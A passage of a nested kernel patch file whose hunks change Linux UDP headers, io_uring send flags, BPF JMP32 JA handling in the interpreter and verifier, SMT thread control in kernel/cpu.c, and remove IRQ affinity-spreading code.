+ int tcp_sendpage_locked(struct sock *sk, struct page *page, int offset,
+diff --git a/include/net/udp.h b/include/net/udp.h
+index fee053bcd17c6..fa4cdbe55552c 100644
+--- a/include/net/udp.h
++++ b/include/net/udp.h
+@@ -269,6 +269,7 @@ int udp_get_port(struct sock *sk, unsigned short snum,
+ int udp_err(struct sk_buff *, u32);
+ int udp_abort(struct sock *sk, int err);
+ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len);
++void udp_splice_eof(struct socket *sock);
+ int udp_push_pending_frames(struct sock *sk);
+ void udp_flush_pending_frames(struct sock *sk);
+ int udp_cmsg_send(struct sock *sk, struct msghdr *msg, u16 *gso_size);
+diff --git a/include/net/udp_tunnel.h b/include/net/udp_tunnel.h
+index 72394f441dad8..e5f81710b18f4 100644
+--- a/include/net/udp_tunnel.h
++++ b/include/net/udp_tunnel.h
+@@ -174,16 +174,13 @@ static inline int udp_tunnel_handle_offloads(struct sk_buff *skb, bool udp_csum)
+ }
+ #endif
+ 
+-static inline void udp_tunnel_encap_enable(struct socket *sock)
++static inline void udp_tunnel_encap_enable(struct sock *sk)
+ {
+-	struct udp_sock *up = udp_sk(sock->sk);
+-
+-	if (up->encap_enabled)
++	if (udp_test_and_set_bit(ENCAP_ENABLED, sk))
+ 		return;
+ 
+-	up->encap_enabled = 1;
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sock->sk->sk_family == PF_INET6)
++	if (READ_ONCE(sk->sk_family) == PF_INET6)
+ 		ipv6_stub->udpv6_encap_enable();
+ #endif
+ 	udp_encap_enable();
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 57c626cb4d1a5..67f09a40bcb21 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -389,6 +389,7 @@ int io_send(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (flags & MSG_WAITALL)
+ 		min_ret = iov_iter_count(&msg.msg_iter);
+ 
++	flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 	msg.msg_flags = flags;
+ 	ret = sock_sendmsg(sock, &msg);
+ 	if (ret < min_ret) {
+@@ -1137,6 +1138,7 @@ int io_send_zc(struct io_kiocb *req, unsigned int issue_flags)
+ 		msg_flags |= MSG_DONTWAIT;
+ 	if (msg_flags & MSG_WAITALL)
+ 		min_ret = iov_iter_count(&msg.msg_iter);
++	msg_flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 
+ 	msg.msg_flags = msg_flags;
+ 	msg.msg_ubuf = &io_notif_to_data(zc->notif)->uarg;
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 7225cb67c0d3a..76bf1de261152 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -365,9 +365,18 @@ static int bpf_adj_delta_to_imm(struct bpf_insn *insn, u32 pos, s32 end_old,
+ static int bpf_adj_delta_to_off(struct bpf_insn *insn, u32 pos, s32 end_old,
+ 				s32 end_new, s32 curr, const bool probe_pass)
+ {
+-	const s32 off_min = S16_MIN, off_max = S16_MAX;
++	s64 off_min, off_max, off;
+ 	s32 delta = end_new - end_old;
+-	s32 off = insn->off;
++
++	if (insn->code == (BPF_JMP32 | BPF_JA)) {
++		off = insn->imm;
++		off_min = S32_MIN;
++		off_max = S32_MAX;
++	} else {
++		off = insn->off;
++		off_min = S16_MIN;
++		off_max = S16_MAX;
++	}
+ 
+ 	if (curr < pos && curr + off + 1 >= end_old)
+ 		off += delta;
+@@ -375,8 +384,12 @@ static int bpf_adj_delta_to_off(struct bpf_insn *insn, u32 pos, s32 end_old,
+ 		off -= delta;
+ 	if (off < off_min || off > off_max)
+ 		return -ERANGE;
+-	if (!probe_pass)
+-		insn->off = off;
++	if (!probe_pass) {
++		if (insn->code == (BPF_JMP32 | BPF_JA))
++			insn->imm = off;
++		else
++			insn->off = off;
++	}
+ 	return 0;
+ }
+ 
+@@ -1586,6 +1599,7 @@ EXPORT_SYMBOL_GPL(__bpf_call_base);
+ 	INSN_3(JMP, JSLE, K),			\
+ 	INSN_3(JMP, JSET, K),			\
+ 	INSN_2(JMP, JA),			\
++	INSN_2(JMP32, JA),			\
+ 	/* Store instructions. */		\
+ 	/*   Register based. */			\
+ 	INSN_3(STX, MEM,  B),			\
+@@ -1862,6 +1876,9 @@ out:
+ 	JMP_JA:
+ 		insn += insn->off;
+ 		CONT;
++	JMP32_JA:
++		insn += insn->imm;
++		CONT;
+ 	JMP_EXIT:
+ 		return BPF_R0;
+ 	/* JMP */
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index c4381dfcd6b09..748ac86169941 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -443,8 +443,8 @@ static int bpf_trampoline_update(struct bpf_trampoline *tr, bool lock_direct_mut
+ 		goto out;
+ 	}
+ 
+-	/* clear all bits except SHARE_IPMODIFY */
+-	tr->flags &= BPF_TRAMP_F_SHARE_IPMODIFY;
++	/* clear all bits except SHARE_IPMODIFY and TAIL_CALL_CTX */
++	tr->flags &= (BPF_TRAMP_F_SHARE_IPMODIFY | BPF_TRAMP_F_TAIL_CALL_CTX);
+ 
+ 	if (tlinks[BPF_TRAMP_FEXIT].nr_links ||
+ 	    tlinks[BPF_TRAMP_MODIFY_RETURN].nr_links) {
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 12d360d80c149..142e10d49fd81 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2254,7 +2254,10 @@ static int check_subprogs(struct bpf_verifier_env *env)
+ 			goto next;
+ 		if (BPF_OP(code) == BPF_EXIT || BPF_OP(code) == BPF_CALL)
+ 			goto next;
+-		off = i + insn[i].off + 1;
++		if (code == (BPF_JMP32 | BPF_JA))
++			off = i + insn[i].imm + 1;
++		else
++			off = i + insn[i].off + 1;
+ 		if (off < subprog_start || off >= subprog_end) {
+ 			verbose(env, "jump out of range from insn %d to %d\n", i, off);
+ 			return -EINVAL;
+@@ -2266,6 +2269,7 @@ next:
+ 			 * or unconditional jump back
+ 			 */
+ 			if (code != (BPF_JMP | BPF_EXIT) &&
++			    code != (BPF_JMP32 | BPF_JA) &&
+ 			    code != (BPF_JMP | BPF_JA)) {
+ 				verbose(env, "last insn is not an exit or jmp\n");
+ 				return -EINVAL;
+@@ -2512,6 +2516,16 @@ static int check_reg_arg(struct bpf_verifier_env *env, u32 regno,
+ 	return 0;
+ }
+ 
++static void mark_jmp_point(struct bpf_verifier_env *env, int idx)
++{
++	env->insn_aux_data[idx].jmp_point = true;
++}
++
++static bool is_jmp_point(struct bpf_verifier_env *env, int insn_idx)
++{
++	return env->insn_aux_data[insn_idx].jmp_point;
++}
++
+ /* for any branch, call, exit record the history of jmps in the given state */
+ static int push_jmp_history(struct bpf_verifier_env *env,
+ 			    struct bpf_verifier_state *cur)
+@@ -2520,6 +2534,9 @@ static int push_jmp_history(struct bpf_verifier_env *env,
+ 	struct bpf_idx_pair *p;
+ 	size_t alloc_size;
+ 
++	if (!is_jmp_point(env, env->insn_idx))
++		return 0;
++
+ 	cnt++;
+ 	alloc_size = kmalloc_size_roundup(size_mul(cnt, sizeof(*p)));
+ 	p = krealloc(cur->jmp_history, alloc_size, GFP_USER);
+@@ -2534,12 +2551,29 @@ static int push_jmp_history(struct bpf_verifier_env *env,
+ 
+ /* Backtrack one insn at a time. If idx is not at the top of recorded
+  * history then previous instruction came from straight line execution.
++ * Return -ENOENT if we exhausted all instructions within given state.
++ *
++ * It's legal to have a bit of a looping with the same starting and ending
++ * insn index within the same state, e.g.: 3->4->5->3, so just because current
++ * instruction index is the same as state's first_idx doesn't mean we are
++ * done. If there is still some jump history left, we should keep going. We
++ * need to take into account that we might have a jump history between given
++ * state's parent and itself, due to checkpointing. In this case, we'll have
++ * history entry recording a jump from last instruction of parent state and
++ * first instruction of given state.
+  */
+ static int get_prev_insn_idx(struct bpf_verifier_state *st, int i,
+ 			     u32 *history)
+ {
+ 	u32 cnt = *history;
+ 
++	if (i == st->first_insn_idx) {
++		if (cnt == 0)
++			return -ENOENT;
++		if (cnt == 1 && st->jmp_history[0].idx == i)
++			return -ENOENT;
++	}
++
+ 	if (cnt && st->jmp_history[cnt - 1].idx == i) {
+ 		i = st->jmp_history[cnt - 1].prev_idx;
+ 		(*history)--;
+@@ -3035,9 +3069,9 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int r
+ 				 * Nothing to be tracked further in the parent state.
+ 				 */
+ 				return 0;
+-			if (i == first_idx)
+-				break;
+ 			i = get_prev_insn_idx(st, i, &history);
++			if (i == -ENOENT)
++				break;
+ 			if (i >= env->prog->len) {
+ 				/* This can happen if backtracking reached insn 0
+ 				 * and there are still reg_mask or stack_mask
+@@ -11000,11 +11034,16 @@ static struct bpf_verifier_state_list **explored_state(
+ 	return &env->explored_states[(idx ^ state->callsite) % state_htab_size(env)];
+ }
+ 
+-static void init_explored_state(struct bpf_verifier_env *env, int idx)
++static void mark_prune_point(struct bpf_verifier_env *env, int idx)
+ {
+ 	env->insn_aux_data[idx].prune_point = true;
+ }
+ 
++static bool is_prune_point(struct bpf_verifier_env *env, int insn_idx)
++{
++	return env->insn_aux_data[insn_idx].prune_point;
++}
++
+ enum {
+ 	DONE_EXPLORING = 0,
+ 	KEEP_EXPLORING = 1,
+@@ -11033,9 +11072,11 @@ static int push_insn(int t, int w, int e, struct bpf_verifier_env *env,
+ 		return -EINVAL;
+ 	}
+ 
+-	if (e == BRANCH)
++	if (e == BRANCH) {
+ 		/* mark branch target for state pruning */
+-		init_explored_state(env, w);
++		mark_prune_point(env, w);
++		mark_jmp_point(env, w);
++	}
+ 
+ 	if (insn_state[w] == 0) {
+ 		/* tree-edge */
+@@ -11062,21 +11103,23 @@ static int push_insn(int t, int w, int e, struct bpf_verifier_env *env,
+ 	return DONE_EXPLORING;
+ }
+ 
+-static int visit_func_call_insn(int t, int insn_cnt,
+-				struct bpf_insn *insns,
++static int visit_func_call_insn(int t, struct bpf_insn *insns,
+ 				struct bpf_verifier_env *env,
+ 				bool visit_callee)
+ {
+-	int ret;
++	int ret, insn_sz;
+ 
+-	ret = push_insn(t, t + 1, FALLTHROUGH, env, false);
++	insn_sz = bpf_is_ldimm64(&insns[t]) ? 2 : 1;
++	ret = push_insn(t, t + insn_sz, FALLTHROUGH, env, false);
+ 	if (ret)
+ 		return ret;
+ 
+-	if (t + 1 < insn_cnt)
+-		init_explored_state(env, t + 1);
++	mark_prune_point(env, t + insn_sz);
++	/* when we exit from subprog, we need to record non-linear history */
++	mark_jmp_point(env, t + insn_sz);
++
+ 	if (visit_callee) {
+-		init_explored_state(env, t);
++		mark_prune_point(env, t);
+ 		ret = push_insn(t, t + insns[t].imm + 1, BRANCH, env,
+ 				/* It's ok to allow recursion from CFG point of
+ 				 * view. __check_func_call() will do the actual
+@@ -11092,65 +11135,64 @@ static int visit_func_call_insn(int t, int insn_cnt,
+  *  DONE_EXPLORING - the instruction was fully explored
+  *  KEEP_EXPLORING - there is still work to be done before it is fully explored
+  */
+-static int visit_insn(int t, int insn_cnt, struct bpf_verifier_env *env)
++static int visit_insn(int t, struct bpf_verifier_env *env)
+ {
+-	struct bpf_insn *insns = env->prog->insnsi;
+-	int ret;
++	struct bpf_insn *insns = env->prog->insnsi, *insn = &insns[t];
++	int ret, off, insn_sz;
+ 
+-	if (bpf_pseudo_func(insns + t))
+-		return visit_func_call_insn(t, insn_cnt, insns, env, true);
++	if (bpf_pseudo_func(insn))
++		return visit_func_call_insn(t, insns, env, true);
+ 
+ 	/* All non-branch instructions have a single fall-through edge. */
+-	if (BPF_CLASS(insns[t].code) != BPF_JMP &&
+-	    BPF_CLASS(insns[t].code) != BPF_JMP32)
+-		return push_insn(t, t + 1, FALLTHROUGH, env, false);
++	if (BPF_CLASS(insn->code) != BPF_JMP &&
++	    BPF_CLASS(insn->code) != BPF_JMP32) {
++		insn_sz = bpf_is_ldimm64(insn) ? 2 : 1;
++		return push_insn(t, t + insn_sz, FALLTHROUGH, env, false);
++	}
+ 
+-	switch (BPF_OP(insns[t].code)) {
++	switch (BPF_OP(insn->code)) {
+ 	case BPF_EXIT:
+ 		return DONE_EXPLORING;
+ 
+ 	case BPF_CALL:
+-		if (insns[t].imm == BPF_FUNC_timer_set_callback)
+-			/* Mark this call insn to trigger is_state_visited() check
+-			 * before call itself is processed by __check_func_call().
+-			 * Otherwise new async state will be pushed for further
+-			 * exploration.
++		if (insn->imm == BPF_FUNC_timer_set_callback)
++			/* Mark this call insn as a prune point to trigger
++			 * is_state_visited() check before call itself is
++			 * processed by __check_func_call(). Otherwise new
++			 * async state will be pushed for further exploration.
+ 			 */
+-			init_explored_state(env, t);
+-		return visit_func_call_insn(t, insn_cnt, insns, env,
+-					    insns[t].src_reg == BPF_PSEUDO_CALL);
++			mark_prune_point(env, t);
++		return visit_func_call_insn(t, insns, env, insn->src_reg == BPF_PSEUDO_CALL);
+ 
+ 	case BPF_JA:
+-		if (BPF_SRC(insns[t].code) != BPF_K)
++		if (BPF_SRC(insn->code) != BPF_K)
+ 			return -EINVAL;
+ 
++		if (BPF_CLASS(insn->code) == BPF_JMP)
++			off = insn->off;
++		else
++			off = insn->imm;
++
+ 		/* unconditional jump with single edge */
+-		ret = push_insn(t, t + insns[t].off + 1, FALLTHROUGH, env,
++		ret = push_insn(t, t + off + 1, FALLTHROUGH, env,
+ 				true);
+ 		if (ret)
+ 			return ret;
+ 
+-		/* unconditional jmp is not a good pruning point,
+-		 * but it's marked, since backtracking needs
+-		 * to record jmp history in is_state_visited().
+-		 */
+-		init_explored_state(env, t + insns[t].off + 1);
+-		/* tell verifier to check for equivalent states
+-		 * after every call and jump
+-		 */
+-		if (t + 1 < insn_cnt)
+-			init_explored_state(env, t + 1);
++		mark_prune_point(env, t + off + 1);
++		mark_jmp_point(env, t + off + 1);
+ 
+ 		return ret;
+ 
+ 	default:
+ 		/* conditional jump with two edges */
+-		init_explored_state(env, t);
++		mark_prune_point(env, t);
++
+ 		ret = push_insn(t, t + 1, FALLTHROUGH, env, true);
+ 		if (ret)
+ 			return ret;
+ 
+-		return push_insn(t, t + insns[t].off + 1, BRANCH, env, true);
++		return push_insn(t, t + insn->off + 1, BRANCH, env, true);
+ 	}
+ }
+ 
+@@ -11181,7 +11223,7 @@ static int check_cfg(struct bpf_verifier_env *env)
+ 	while (env->cfg.cur_stack > 0) {
+ 		int t = insn_stack[env->cfg.cur_stack - 1];
+ 
+-		ret = visit_insn(t, insn_cnt, env);
++		ret = visit_insn(t, env);
+ 		switch (ret) {
+ 		case DONE_EXPLORING:
+ 			insn_state[t] = EXPLORED;
+@@ -11205,11 +11247,21 @@ static int check_cfg(struct bpf_verifier_env *env)
+ 	}
+ 
+ 	for (i = 0; i < insn_cnt; i++) {
++		struct bpf_insn *insn = &env->prog->insnsi[i];
++
+ 		if (insn_state[i] != EXPLORED) {
+ 			verbose(env, "unreachable insn %d\n", i);
+ 			ret = -EINVAL;
+ 			goto err_free;
+ 		}
++		if (bpf_is_ldimm64(insn)) {
++			if (insn_state[i + 1] != 0) {
++				verbose(env, "jump into the middle of ldimm64 insn %d\n", i);
++				ret = -EINVAL;
++				goto err_free;
++			}
++			i++; /* skip second half of ldimm64 */
++		}
+ 	}
+ 	ret = 0; /* cfg looks good */
+ 
+@@ -12178,11 +12230,11 @@ static int is_state_visited(struct bpf_verifier_env *env, int insn_idx)
+ 	bool add_new_state = env->test_state_freq ? true : false;
+ 
+ 	cur->last_insn_idx = env->prev_insn_idx;
+-	if (!env->insn_aux_data[insn_idx].prune_point)
++	if (!is_prune_point(env, insn_idx))
+ 		/* this 'insn_idx' instruction wasn't marked, so we will not
+ 		 * be doing state search here
+ 		 */
+-		return 0;
++		return push_jmp_history(env, cur);
+ 
+ 	/* bpf progs typically have pruning point every 4 instructions
+ 	 * http://vger.kernel.org/bpfconf2019.html#session-1
+@@ -12674,15 +12726,18 @@ static int do_check(struct bpf_verifier_env *env)
+ 					return err;
+ 			} else if (opcode == BPF_JA) {
+ 				if (BPF_SRC(insn->code) != BPF_K ||
+-				    insn->imm != 0 ||
+ 				    insn->src_reg != BPF_REG_0 ||
+ 				    insn->dst_reg != BPF_REG_0 ||
+-				    class == BPF_JMP32) {
++				    (class == BPF_JMP && insn->imm != 0) ||
++				    (class == BPF_JMP32 && insn->off != 0)) {
+ 					verbose(env, "BPF_JA uses reserved fields\n");
+ 					return -EINVAL;
+ 				}
+ 
+-				env->insn_idx += insn->off + 1;
++				if (class == BPF_JMP)
++					env->insn_idx += insn->off + 1;
++				else
++					env->insn_idx += insn->imm + 1;
+ 				continue;
+ 
+ 			} else if (opcode == BPF_EXIT) {
+@@ -13508,13 +13563,13 @@ static bool insn_is_cond_jump(u8 code)
+ {
+ 	u8 op;
+ 
++	op = BPF_OP(code);
+ 	if (BPF_CLASS(code) == BPF_JMP32)
+-		return true;
++		return op != BPF_JA;
+ 
+ 	if (BPF_CLASS(code) != BPF_JMP)
+ 		return false;
+ 
+-	op = BPF_OP(code);
+ 	return op != BPF_JA && op != BPF_EXIT && op != BPF_CALL;
+ }
+ 
+@@ -15442,6 +15497,9 @@ static int check_attach_btf_id(struct bpf_verifier_env *env)
+ 	if (!tr)
+ 		return -ENOMEM;
+ 
++	if (tgt_prog && tgt_prog->aux->tail_call_reachable)
++		tr->flags = BPF_TRAMP_F_TAIL_CALL_CTX;
++
+ 	prog->aux->dst_trampoline = tr;
+ 	return 0;
+ }
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 551468d9c5a85..e6f0101941ed8 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -446,9 +446,31 @@ static int __init smt_cmdline_disable(char *str)
+ }
+ early_param("nosmt", smt_cmdline_disable);
+ 
+-static inline bool cpu_smt_allowed(unsigned int cpu)
++/*
++ * For Archicture supporting partial SMT states check if the thread is allowed.
++ * Otherwise this has already been checked through cpu_smt_max_threads when
++ * setting the SMT level.
++ */
++static inline bool cpu_smt_thread_allowed(unsigned int cpu)
+ {
+-	if (cpu_smt_control == CPU_SMT_ENABLED)
++#ifdef CONFIG_SMT_NUM_THREADS_DYNAMIC
++	return topology_smt_thread_allowed(cpu);
++#else
++	return true;
++#endif
++}
++
++static inline bool cpu_bootable(unsigned int cpu)
++{
++	if (cpu_smt_control == CPU_SMT_ENABLED && cpu_smt_thread_allowed(cpu))
++		return true;
++
++	/* All CPUs are bootable if controls are not configured */
++	if (cpu_smt_control == CPU_SMT_NOT_IMPLEMENTED)
++		return true;
++
++	/* All CPUs are bootable if CPU is not SMT capable */
++	if (cpu_smt_control == CPU_SMT_NOT_SUPPORTED)
+ 		return true;
+ 
+ 	if (topology_is_primary_thread(cpu))
+@@ -471,7 +493,7 @@ bool cpu_smt_possible(void)
+ }
+ EXPORT_SYMBOL_GPL(cpu_smt_possible);
+ #else
+-static inline bool cpu_smt_allowed(unsigned int cpu) { return true; }
++static inline bool cpu_bootable(unsigned int cpu) { return true; }
+ #endif
+ 
+ static inline enum cpuhp_state
+@@ -574,10 +596,10 @@ static int bringup_wait_for_ap(unsigned int cpu)
+ 	 * SMT soft disabling on X86 requires to bring the CPU out of the
+ 	 * BIOS 'wait for SIPI' state in order to set the CR4.MCE bit.  The
+ 	 * CPU marked itself as booted_once in notify_cpu_starting() so the
+-	 * cpu_smt_allowed() check will now return false if this is not the
++	 * cpu_bootable() check will now return false if this is not the
+ 	 * primary sibling.
+ 	 */
+-	if (!cpu_smt_allowed(cpu))
++	if (!cpu_bootable(cpu))
+ 		return -ECANCELED;
+ 
+ 	if (st->target <= CPUHP_AP_ONLINE_IDLE)
+@@ -1464,7 +1486,7 @@ static int cpu_up(unsigned int cpu, enum cpuhp_state target)
+ 		err = -EBUSY;
+ 		goto out;
+ 	}
+-	if (!cpu_smt_allowed(cpu)) {
++	if (!cpu_bootable(cpu)) {
+ 		err = -EPERM;
+ 		goto out;
+ 	}
+@@ -2294,6 +2316,12 @@ int cpuhp_smt_disable(enum cpuhp_smt_control ctrlval)
+ 	for_each_online_cpu(cpu) {
+ 		if (topology_is_primary_thread(cpu))
+ 			continue;
++		/*
++		 * Disable can be called with CPU_SMT_ENABLED when changing
++		 * from a higher to lower number of SMT threads per core.
++		 */
++		if (ctrlval == CPU_SMT_ENABLED && cpu_smt_thread_allowed(cpu))
++			continue;
+ 		ret = cpu_down_maps_locked(cpu, CPUHP_OFFLINE);
+ 		if (ret)
+ 			break;
+@@ -2328,6 +2356,8 @@ int cpuhp_smt_enable(void)
+ 		/* Skip online CPUs and CPUs on offline nodes */
+ 		if (cpu_online(cpu) || !node_online(cpu_to_node(cpu)))
+ 			continue;
++		if (!cpu_smt_thread_allowed(cpu))
++			continue;
+ 		ret = _cpu_up(cpu, 0, CPUHP_ONLINE);
+ 		if (ret)
+ 			break;
+diff --git a/kernel/irq/affinity.c b/kernel/irq/affinity.c
+index d9a5c1d65a79d..44a4eba80315c 100644
+--- a/kernel/irq/affinity.c
++++ b/kernel/irq/affinity.c
+@@ -7,398 +7,7 @@
+ #include <linux/kernel.h>
+ #include <linux/slab.h>
+ #include <linux/cpu.h>
+-#include <linux/sort.h>
+-
+-static void irq_spread_init_one(struct cpumask *irqmsk, struct cpumask *nmsk,
+-				unsigned int cpus_per_vec)
+-{
+-	const struct cpumask *siblmsk;
+-	int cpu, sibl;
+-
+-	for ( ; cpus_per_vec > 0; ) {
+-		cpu = cpumask_first(nmsk);
+-
+-		/* Should not happen, but I'm too lazy to think about it */
+-		if (cpu >= nr_cpu_ids)
+-			return;
+-
+-		cpumask_clear_cpu(cpu, nmsk);
+-		cpumask_set_cpu(cpu, irqmsk);
+-		cpus_per_vec--;
+-
+-		/* If the cpu has siblings, use them first */
+-		siblmsk = topology_sibling_cpumask(cpu);
+-		for (sibl = -1; cpus_per_vec > 0; ) {
+-			sibl = cpumask_next(sibl, siblmsk);
+-			if (sibl >= nr_cpu_ids)
+-				break;
+-			if (!cpumask_test_and_clear_cpu(sibl, nmsk))
+-				continue;
+-			cpumask_set_cpu(sibl, irqmsk);
+-			cpus_per_vec--;
+-		}
+-	}
+-}
+-
+-static cpumask_var_t *alloc_node_to_cpumask(void)
+-{
+-	cpumask_var_t *masks;
+-	int node;
+-
+-	masks = kcalloc(nr_node_ids, sizeof(cpumask_var_t), GFP_KERNEL);
+-	if (!masks)
+-		return NULL;
+-
+-	for (node = 0; node < nr_node_ids; node++) {
+-		if (!zalloc_cpumask_var(&masks[node], GFP_KERNEL))
+-			goto out_unwind;
+-	}
+-
+-	return masks;
+-
+-out_unwind:
+-	while (--node >= 0)
+-		free_cpumask_var(masks[node]);
+-	kfree(masks);
+-	return NULL;
+-}
+-
+-static void free_node_to_cpumask(cpumask_var_t *masks)
+-{
+-	int node;
+-
+-	for (node = 0; node < nr_node_ids; node++)
+-		free_cpumask_var(masks[node]);
+-	kfree(masks);
+-}
+-
+-static void build_node_to_cpumask(cpumask_var_t *masks)
+-{
+-	int cpu;
+-
+-	for_each_possible_cpu(cpu)
+-		cpumask_set_cpu(cpu, masks[cpu_to_node(cpu)]);
+-}
+-
+-static int get_nodes_in_cpumask(cpumask_var_t *node_to_cpumask,
+-				const struct cpumask *mask, nodemask_t *nodemsk)
+-{
+-	int n, nodes = 0;
+-
+-	/* Calculate the number of nodes in the supplied affinity mask */
+-	for_each_node(n) {
+-		if (cpumask_intersects(mask, node_to_cpumask[n])) {
+-			node_set(n, *nodemsk);
+-			nodes++;
+-		}
+-	}
+-	return nodes;
+-}
+-
+-struct node_vectors {
+-	unsigned id;
+-
+-	union {
+-		unsigned nvectors;
+-		unsigned ncpus;
+-	};
+-};
+-
+-static int ncpus_cmp_func(const void *l, const void *r)
+-{
+-	const struct node_vectors *ln = l;
+-	const struct node_vectors *rn = r;
+-
+-	return ln->ncpus - rn->ncpus;
+-}
+-
+-/*
+- * Allocate vector number for each node, so that for each node:
+- *
+- * 1) the allocated number is >= 1
+- *
+- * 2) the allocated numbver is <= active CPU number of this node
+- *
+- * The actual allocated total vectors may be less than @numvecs when
+- * active total CPU number is less than @numvecs.
+- *
+- * Active CPUs means the CPUs in '@cpu_mask AND @node_to_cpumask[]'
+- * for each node.
+- */
+-static void alloc_nodes_vectors(unsigned int numvecs,
+-				cpumask_var_t *node_to_cpumask,
+-				const struct cpumask *cpu_mask,
+-				const nodemask_t nodemsk,
+-				struct cpumask *nmsk,
+-				struct node_vectors *node_vectors)
+-{
+-	unsigned n, remaining_ncpus = 0;
+-
+-	for (n = 0; n < nr_node_ids; n++) {
+-		node_vectors[n].id = n;
+-		node_vectors[n].ncpus = UINT_MAX;
+-	}
+-
+-	for_each_node_mask(n, nodemsk) {
+-		unsigned ncpus;
+-
+-		cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
+-		ncpus = cpumask_weight(nmsk);
+-
+-		if (!ncpus)
+-			continue;
+-		remaining_ncpus += ncpus;
+-		node_vectors[n].ncpus = ncpus;
+-	}
+-
+-	numvecs = min_t(unsigned, remaining_ncpus, numvecs);
+-
+-	sort(node_vectors, nr_node_ids, sizeof(node_vectors[0]),
+-	     ncpus_cmp_func, NULL);
+-
+-	/*
+-	 * Allocate vectors for each node according to the ratio of this
+-	 * node's nr_cpus to remaining un-assigned ncpus. 'numvecs' is
+-	 * bigger than number of active numa nodes. Always start the
+-	 * allocation from the node with minimized nr_cpus.
+-	 *
+-	 * This way guarantees that each active node gets allocated at
+-	 * least one vector, and the theory is simple: over-allocation
+-	 * is only done when this node is assigned by one vector, so
+-	 * other nodes will be allocated >= 1 vector, since 'numvecs' is
+-	 * bigger than number of numa nodes.
+-	 *
+-	 * One perfect invariant is that number of allocated vectors for
+-	 * each node is <= CPU count of this node:
+-	 *
+-	 * 1) suppose there are two nodes: A and B
+-	 * 	ncpu(X) is CPU count of node X
+-	 * 	vecs(X) is the vector count allocated to node X via this
+-	 * 	algorithm
+-	 *
+-	 * 	ncpu(A) <= ncpu(B)
+-	 * 	ncpu(A) + ncpu(B) = N
+-	 * 	vecs(A) + vecs(B) = V
+-	 *
+-	 * 	vecs(A) = max(1, round_down(V * ncpu(A) / N))
+-	 * 	vecs(B) = V - vecs(A)
+-	 *
+-	 * 	both N and V are integer, and 2 <= V <= N, suppose
+-	 * 	V = N - delta, and 0 <= delta <= N - 2
+-	 *
+-	 * 2) obviously vecs(A) <= ncpu(A) because:
+-	 *
+-	 * 	if vecs(A) is 1, then vecs(A) <= ncpu(A) given
+-	 * 	ncpu(A) >= 1
+-	 *
+-	 * 	otherwise,
+-	 * 		vecs(A) <= V * ncpu(A) / N <= ncpu(A), given V <= N
+-	 *
+-	 * 3) prove how vecs(B) <= ncpu(B):
+-	 *
+-	 * 	if round_down(V * ncpu(A) / N) == 0, vecs(B) won't be
+-	 * 	over-allocated, so vecs(B) <= ncpu(B),
+-	 *
+-	 * 	otherwise:
+-	 *
+-	 * 	vecs(A) =
+-	 * 		round_down(V * ncpu(A) / N) =
+-	 * 		round_down((N - delta) * ncpu(A) / N) =
+-	 * 		round_down((N * ncpu(A) - delta * ncpu(A)) / N)	 >=
+-	 * 		round_down((N * ncpu(A) - delta * N) / N)	 =
+-	 * 		cpu(A) - delta
+-	 *
+-	 * 	then:
+-	 *
+-	 * 	vecs(A) - V >= ncpu(A) - delta - V
+-	 * 	=>
+-	 * 	V - vecs(A) <= V + delta - ncpu(A)
+-	 * 	=>
+-	 * 	vecs(B) <= N - ncpu(A)
+-	 * 	=>
+-	 * 	vecs(B) <= cpu(B)
+-	 *
+-	 * For nodes >= 3, it can be thought as one node and another big
+-	 * node given that is exactly what this algorithm is implemented,
+-	 * and we always re-calculate 'remaining_ncpus' & 'numvecs', and
+-	 * finally for each node X: vecs(X) <= ncpu(X).
+-	 *
+-	 */
+-	for (n = 0; n < nr_node_ids; n++) {
+-		unsigned nvectors, ncpus;
+-
+-		if (node_vectors[n].ncpus == UINT_MAX)
+-			continue;
+-
+-		WARN_ON_ONCE(numvecs == 0);
+-
+-		ncpus = node_vectors[n].ncpus;
+-		nvectors = max_t(unsigned, 1,
+-				 numvecs * ncpus / remaining_ncpus);
+-		WARN_ON_ONCE(nvectors > ncpus);
+-
+-		node_vectors[n].nvectors = nvectors;
+-
+-		remaining_ncpus -= ncpus;
+-		numvecs -= nvectors;
+-	}
+-}
+-
+-static int __irq_build_affinity_masks(unsigned int startvec,
+-				      unsigned int numvecs,
+-				      unsigned int firstvec,
+-				      cpumask_var_t *node_to_cpumask,
+-				      const struct cpumask *cpu_mask,
+-				      struct cpumask *nmsk,
+-				      struct irq_affinity_desc *masks)
+-{
+-	unsigned int i, n, nodes, cpus_per_vec, extra_vecs, done = 0;
+-	unsigned int last_affv = firstvec + numvecs;
+-	unsigned int curvec = startvec;
+-	nodemask_t nodemsk = NODE_MASK_NONE;
+-	struct node_vectors *node_vectors;
+-
+-	if (cpumask_empty(cpu_mask))
+-		return 0;
+-
+-	nodes = get_nodes_in_cpumask(node_to_cpumask, cpu_mask, &nodemsk);
+-
+-	/*
+-	 * If the number of nodes in the mask is greater than or equal the
+-	 * number of vectors we just spread the vectors across the nodes.
+-	 */
+-	if (numvecs <= nodes) {
+-		for_each_node_mask(n, nodemsk) {
+-			/* Ensure that only CPUs which are in both masks are set */
+-			cpumask_and(nmsk, cpu_mask, node_to_cpumask[n]);
+-			cpumask_or(&masks[curvec].mask, &masks[curvec].mask, nmsk);
+-			if (++curvec == last_affv)
+-				curvec = firstvec;
+-		}
+-		return numvecs;
+-	}
+-
+-	node_vectors = kcalloc(nr_node_ids,
+-			       sizeof(struct node_vectors),
+-			       GFP_KERNEL);
+-	if (!node_vectors)
+-		return -ENOMEM;
